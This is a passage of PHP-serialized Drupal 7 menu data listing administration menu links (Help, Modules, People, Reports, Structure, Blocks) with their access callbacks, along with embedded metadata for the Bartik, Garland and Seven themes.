modules.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"9\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"12\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:9:\"help_main\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:10:\"admin/help\";s:5:\"title\";s:4:\"Help\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:48:\"Reference for usage, configuration, and modules.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:13;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"13\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:11:\"admin/index\";s:11:\"router_path\";s:11:\"admin/index\";s:10:\"link_title\";s:5:\"Index\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-18\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"13\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:18:\"system_admin_index\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:5:\"admin\";s:8:\"tab_root\";s:5:\"admin\";s:5:\"title\";s:5:\"Index\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:16;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"16\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/modules\";s:11:\"router_path\";s:13:\"admin/modules\";s:10:\"link_title\";s:7:\"Modules\";s:7:\"options\";s:76:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:26:\"Extend site functionality.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-2\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"16\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:36:\"a:1:{i:0;s:18:\"administer modules\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:32:\"a:1:{i:0;s:14:\"system_modules\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/modules\";s:5:\"title\";s:7:\"Modules\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:26:\"Extend site functionality.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:18;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"18\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:12:\"admin/people\";s:11:\"router_path\";s:12:\"admin/people\";s:10:\"link_title\";s:6:\"People\";s:7:\"options\";s:95:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:45:\"Manage user accounts, roles, and permissions.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-4\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"18\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:34:\"a:1:{i:0;s:16:\"administer users\";}\";s:13:\"page_callback\";s:10:\"user_admin\";s:14:\"page_arguments\";s:21:\"a:1:{i:0;s:4:\"list\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:12:\"admin/people\";s:5:\"title\";s:6:\"People\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:45:\"Manage user accounts, roles, and permissions.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:19;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"19\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/reports\";s:11:\"router_path\";s:13:\"admin/reports\";s:10:\"link_title\";s:7:\"Reports\";s:7:\"options\";s:84:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:34:\"View reports, updates, and errors.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"5\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/reports\";s:5:\"title\";s:7:\"Reports\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:34:\"View reports, updates, and errors.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:21;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"21\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:15:\"admin/structure\";s:11:\"router_path\";s:15:\"admin/structure\";s:10:\"link_title\";s:9:\"Structure\";s:7:\"options\";s:95:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:45:\"Administer blocks, content types, menus, etc.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-8\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:15:\"admin/structure\";s:5:\"title\";s:9:\"Structure\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:45:\"Administer blocks, content types, menus, etc.\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:5:{i:30;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"30\";s:4:\"plid\";s:2:\"21\";s:9:\"link_path\";s:21:\"admin/structure/block\";s:11:\"router_path\";s:21:\"admin/structure/block\";s:10:\"link_title\";s:6:\"Blocks\";s:7:\"options\";s:129:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:79:\"Configure what block content appears in your site\'s sidebars and other regions.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:2:\"30\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"administer blocks\";}\";s:13:\"page_callback\";s:19:\"block_admin_display\";s:14:\"page_arguments\";s:35:\"a:1:{i:0;s:17:\"responsive_bartik\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:21:\"admin/structure/block\";s:5:\"title\";s:6:\"Blocks\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:79:\"Configure what block content appears in your site\'s sidebars and other regions.\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:8:{i:92;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"92\";s:4:\"plid\";s:2:\"30\";s:9:\"link_path\";s:25:\"admin/structure/block/add\";s:11:\"router_path\";s:25:\"admin/structure/block/add\";s:10:\"link_title\";s:9:\"Add block\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"4\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:2:\"30\";s:2:\"p4\";s:2:\"92\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"administer blocks\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:38:\"a:1:{i:0;s:20:\"block_add_block_form\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:21:\"admin/structure/block\";s:8:\"tab_root\";s:21:\"admin/structure/block\";s:5:\"title\";s:9:\"Add block\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"388\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:131;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"131\";s:4:\"plid\";s:2:\"30\";s:9:\"link_path\";s:33:\"admin/structure/block/list/bartik\";s:11:\"router_path\";s:33:\"admin/structure/block/list/bartik\";s:10:\"link_title\";s:6:\"Bartik\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"4\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:2:\"30\";s:2:\"p4\";s:3:\"131\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:20:\"_block_themes_access\";s:16:\"access_arguments\";s:2737:\"a:1:{i:0;O:8:\"stdClass\":12:{s:8:\"filename\";s:25:\"themes/bartik/bartik.info\";s:4:\"name\";s:6:\"bartik\";s:4:\"type\";s:5:\"theme\";s:5:\"owner\";s:45:\"themes/engines/phptemplate/phptemplate.engine\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:2:\"-1\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:19:{s:4:\"name\";s:6:\"Bartik\";s:11:\"description\";s:48:\"A flexible, recolorable theme with many regions.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.40\";s:4:\"core\";s:3:\"7.x\";s:11:\"stylesheets\";a:2:{s:3:\"all\";a:3:{s:14:\"css/layout.css\";s:28:\"themes/bartik/css/layout.css\";s:13:\"css/style.css\";s:27:\"themes/bartik/css/style.css\";s:14:\"css/colors.css\";s:28:\"themes/bartik/css/colors.css\";}s:5:\"print\";a:1:{s:13:\"css/print.css\";s:27:\"themes/bartik/css/print.css\";}}s:7:\"regions\";a:20:{s:6:\"header\";s:6:\"Header\";s:4:\"help\";s:4:\"Help\";s:8:\"page_top\";s:8:\"Page top\";s:11:\"page_bottom\";s:11:\"Page bottom\";s:11:\"highlighted\";s:11:\"Highlighted\";s:8:\"featured\";s:8:\"Featured\";s:7:\"content\";s:7:\"Content\";s:13:\"sidebar_first\";s:13:\"Sidebar first\";s:14:\"sidebar_second\";s:14:\"Sidebar second\";s:14:\"triptych_first\";s:14:\"Triptych first\";s:15:\"triptych_middle\";s:15:\"Triptych middle\";s:13:\"triptych_last\";s:13:\"Triptych last\";s:18:\"footer_firstcolumn\";s:19:\"Footer first column\";s:19:\"footer_secondcolumn\";s:20:\"Footer second column\";s:18:\"footer_thirdcolumn\";s:19:\"Footer third column\";s:19:\"footer_fourthcolumn\";s:20:\"Footer fourth column\";s:6:\"footer\";s:6:\"Footer\";s:14:\"dashboard_main\";s:16:\"Dashboard (main)\";s:17:\"dashboard_sidebar\";s:19:\"Dashboard (sidebar)\";s:18:\"dashboard_inactive\";s:20:\"Dashboard (inactive)\";}s:8:\"settings\";a:1:{s:20:\"shortcut_module_link\";s:1:\"0\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1444866674\";s:6:\"engine\";s:11:\"phptemplate\";s:8:\"features\";a:9:{i:0;s:4:\"logo\";i:1;s:7:\"favicon\";i:2;s:4:\"name\";i:3;s:6:\"slogan\";i:4;s:17:\"node_user_picture\";i:5;s:20:\"comment_user_picture\";i:6;s:25:\"comment_user_verification\";i:7;s:9:\"main_menu\";i:8;s:14:\"secondary_menu\";}s:10:\"screenshot\";s:28:\"themes/bartik/screenshot.png\";s:3:\"php\";s:5:\"5.2.4\";s:7:\"scripts\";a:0:{}s:5:\"mtime\";i:1444866674;s:15:\"overlay_regions\";a:5:{i:0;s:14:\"dashboard_main\";i:1;s:17:\"dashboard_sidebar\";i:2;s:18:\"dashboard_inactive\";i:3;s:7:\"content\";i:4;s:4:\"help\";}s:14:\"regions_hidden\";a:2:{i:0;s:8:\"page_top\";i:1;s:11:\"page_bottom\";}s:28:\"overlay_supplemental_regions\";a:1:{i:0;s:8:\"page_top\";}}s:6:\"prefix\";s:11:\"phptemplate\";s:11:\"stylesheets\";a:2:{s:3:\"all\";a:3:{s:14:\"css/layout.css\";s:28:\"themes/bartik/css/layout.css\";s:13:\"css/style.css\";s:27:\"themes/bartik/css/style.css\";s:14:\"css/colors.css\";s:28:\"themes/bartik/css/colors.css\";}s:5:\"print\";a:1:{s:13:\"css/print.css\";s:27:\"themes/bartik/css/print.css\";}}s:6:\"engine\";s:11:\"phptemplate\";}}\";s:13:\"page_callback\";s:19:\"block_admin_display\";s:14:\"page_arguments\";s:23:\"a:1:{i:0;s:6:\"bartik\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:21:\"admin/structure/block\";s:8:\"tab_root\";s:21:\"admin/structure/block\";s:5:\"title\";s:6:\"Bartik\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:137;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"137\";s:4:\"plid\";s:2:\"30\";s:9:\"link_path\";s:34:\"admin/structure/block/list/garland\";s:11:\"router_path\";s:34:\"admin/structure/block/list/garland\";s:10:\"link_title\";s:7:\"Garland\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"4\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:2:\"30\";s:2:\"p4\";s:3:\"137\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:20:\"_block_themes_access\";s:16:\"access_arguments\";s:2159:\"a:1:{i:0;O:8:\"stdClass\":12:{s:8:\"filename\";s:27:\"themes/garland/garland.info\";s:4:\"name\";s:7:\"garland\";s:4:\"type\";s:5:\"theme\";s:5:\"owner\";s:45:\"themes/engines/phptemplate/phptemplate.engine\";s:6:\"status\";s:1:\"0\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:2:\"-1\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:19:{s:4:\"name\";s:7:\"Garland\";s:11:\"description\";s:111:\"A multi-column theme which can be configured to modify colors and switch between fixed and fluid width layouts.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.40\";s:4:\"core\";s:3:\"7.x\";s:11:\"stylesheets\";a:2:{s:3:\"all\";a:1:{s:9:\"style.css\";s:24:\"themes/garland/style.css\";}s:5:\"print\";a:1:{s:9:\"print.css\";s:24:\"themes/garland/print.css\";}}s:8:\"settings\";a:1:{s:13:\"garland_width\";s:5:\"fluid\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1444866674\";s:6:\"engine\";s:11:\"phptemplate\";s:7:\"regions\";a:12:{s:13:\"sidebar_first\";s:12:\"Left sidebar\";s:14:\"sidebar_second\";s:13:\"Right sidebar\";s:7:\"content\";s:7:\"Content\";s:6:\"header\";s:6:\"Header\";s:6:\"footer\";s:6:\"Footer\";s:11:\"highlighted\";s:11:\"Highlighted\";s:4:\"help\";s:4:\"Help\";s:8:\"page_top\";s:8:\"Page top\";s:11:\"page_bottom\";s:11:\"Page bottom\";s:14:\"dashboard_main\";s:16:\"Dashboard (main)\";s:17:\"dashboard_sidebar\";s:19:\"Dashboard (sidebar)\";s:18:\"dashboard_inactive\";s:20:\"Dashboard (inactive)\";}s:8:\"features\";a:9:{i:0;s:4:\"logo\";i:1;s:7:\"favicon\";i:2;s:4:\"name\";i:3;s:6:\"slogan\";i:4;s:17:\"node_user_picture\";i:5;s:20:\"comment_user_picture\";i:6;s:25:\"comment_user_verification\";i:7;s:9:\"main_menu\";i:8;s:14:\"secondary_menu\";}s:10:\"screenshot\";s:29:\"themes/garland/screenshot.png\";s:3:\"php\";s:5:\"5.2.4\";s:7:\"scripts\";a:0:{}s:5:\"mtime\";i:1444866674;s:15:\"overlay_regions\";a:5:{i:0;s:14:\"dashboard_main\";i:1;s:17:\"dashboard_sidebar\";i:2;s:18:\"dashboard_inactive\";i:3;s:7:\"content\";i:4;s:4:\"help\";}s:14:\"regions_hidden\";a:2:{i:0;s:8:\"page_top\";i:1;s:11:\"page_bottom\";}s:28:\"overlay_supplemental_regions\";a:1:{i:0;s:8:\"page_top\";}}s:6:\"prefix\";s:11:\"phptemplate\";s:11:\"stylesheets\";a:2:{s:3:\"all\";a:1:{s:9:\"style.css\";s:24:\"themes/garland/style.css\";}s:5:\"print\";a:1:{s:9:\"print.css\";s:24:\"themes/garland/print.css\";}}s:6:\"engine\";s:11:\"phptemplate\";}}\";s:13:\"page_callback\";s:19:\"block_admin_display\";s:14:\"page_arguments\";s:24:\"a:1:{i:0;s:7:\"garland\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:21:\"admin/structure/block\";s:8:\"tab_root\";s:21:\"admin/structure/block\";s:5:\"title\";s:7:\"Garland\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:143;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"143\";s:4:\"plid\";s:2:\"30\";s:9:\"link_path\";s:32:\"admin/structure/block/list/seven\";s:11:\"router_path\";s:32:\"admin/structure/block/list/seven\";s:10:\"link_title\";s:5:\"Seven\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"4\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:2:\"30\";s:2:\"p4\";s:3:\"143\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:20:\"_block_themes_access\";s:16:\"access_arguments\";s:1959:\"a:1:{i:0;O:8:\"stdClass\":12:{s:8:\"filename\";s:23:\"themes/seven/seven.info\";s:4:\"name\";s:5:\"seven\";s:4:\"type\";s:5:\"theme\";s:5:\"owner\";s:45:\"themes/engines/phptemplate/phptemplate.engine\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:2:\"-1\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:19:{s:4:\"name\";s:5:\"Seven\";s:11:\"description\";s:65:\"A simple one-column, tableless, fluid width administration theme.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.40\";s:4:\"core\";s:3:\"7.x\";s:11:\"stylesheets\";a:1:{s:6:\"screen\";a:2:{s:9:\"reset.css\";s:22:\"themes/seven/reset.css\";s:9:\"style.css\";s:22:\"themes/seven/style.css\";}}s:8:\"settings\";a:1:{s:20:\"shortcut_module_link\";s:1:\"1\";}s:7:\"regions\";a:8:{s:7:\"content\";s:7:\"Content\";s:4:\"help\";s:4:\"Help\";s:8:\"page_top\";s:8:\"Page top\";s:11:\"page_bottom\";s:11:\"Page bottom\";s:13:\"sidebar_first\";s:13:\"First sidebar\";s:14:\"dashboard_main\";s:16:\"Dashboard (main)\";s:17:\"dashboard_sidebar\";s:19:\"Dashboard (sidebar)\";s:18:\"dashboard_inactive\";s:20:\"Dashboard (inactive)\";}s:14:\"regions_hidden\";a:3:{i:0;s:13:\"sidebar_first\";i:1;s:8:\"page_top\";i:2;s:11:\"page_bottom\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1444866674\";s:6:\"engine\";s:11:\"phptemplate\";s:8:\"features\";a:9:{i:0;s:4:\"logo\";i:1;s:7:\"favicon\";i:2;s:4:\"name\";i:3;s:6:\"slogan\";i:4;s:17:\"node_user_picture\";i:5;s:20:\"comment_user_picture\";i:6;s:25:\"comment_user_verification\";i:7;s:9:\"main_menu\";i:8;s:14:\"secondary_menu\";}s:10:\"screenshot\";s:27:\"themes/seven/screenshot.png\";s:3:\"php\";s:5:\"5.2.4\";s:7:\"scripts\";a:0:{}s:5:\"mtime\";i:1444866674;s:15:\"overlay_regions\";a:5:{i:0;s:14:\"dashboard_main\";i:1;s:17:\"dashboard_sidebar\";i:2;s:18:\"dashboard_inactive\";i:3;s:7:\"content\";i:4;s:4:\"help\";}s:28:\"overlay_supplemental_regions\";a:1:{i:0;s:8:\"page_top\";}}s:6:\"prefix\";s:11:\"phptemplate\";s:11:\"stylesheets\";a:1:{s:6:\"screen\";a:2:{s:9:\"reset.css\";s:22:\"themes/seven/reset.css\";s:9:\"style.css\";s:22:\"themes/seven/style.css\";}}s:6:\"engine\";s:11:\"phptemplate\";}}\";s:13:\"page_callback\";s:19:\"block_admin_display\";s:14:\"page_arguments\"